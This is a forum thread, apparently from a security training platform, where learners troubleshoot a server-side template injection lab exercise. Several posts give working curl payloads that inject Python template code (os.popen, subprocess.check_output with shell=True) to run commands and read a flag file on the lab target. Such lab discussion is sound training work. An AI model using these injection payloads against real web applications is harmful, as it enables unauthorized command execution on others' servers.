SSTI Exploitation Example 2

tplmap did not work for me in the exercise at the end of this section nor did the provided CURL injection code of return visible code execution

curl -X POST -d "email={% import os %}{{os.system('whoami')}}" http://<TARGET IP>:<PORT>/jointheteam

I would get a response of

Email 0 has been subscribed. You’ll hear from us soon!
so, if anyone else gets stuck here, the CURL injection that worked for me to be able to get back code execution was

curl -X POST -d “email={% import os %}{{os.popen(‘whoami’).read()}}” http://TARGET_IP:PORT/jointheteam"

Hope this helps!

1 Like

Thank you! I’ve been stuck on this exercise for some time; tplmap didn’t work for me too.
How did you figure out the payload? Do you have any idea why values like 0, 256, and 512 were returned in the response for wrong payloads?

1 Like

I finally figured it out! I was stuck on this for quite a while. When you’re using os.system() what you get in return is the process exit value (0 = success, 1 = failure). To get the actual output you’ll need to use the subprocess python module with the following payload: email={% import subprocess %}{{subprocess.check_output('whoami',shell=True)}}
Hope it helps!

1 Like

I’m getting this error: ‘}}”: command not found’
after running curl -X POST -d "email={% import os %}{{os.system('whoami')}}" http://<TARGET IP>:<PORT>/jointheteam

Thanks for sharing. When I run this as the email payload, I get this error: }}": command not found. I also ran the payload directly in the URL and got the message: Computer says noo! lol

I finally got the flag using the pwnbox and Dana’s tip. However, I keep getting the }}" command not found error while using my vm with the same command. I also found an alternative using email=$(whoami) but this results in the user htb-ac-587177 instead of root and as a result I was not able to get the flag this way

1 Like

curl -X POST -d “email={% import subprocess %}{{subprocess.check_output(‘cat+****.txt’,shell=True)}}” http://ip:port/jointheteam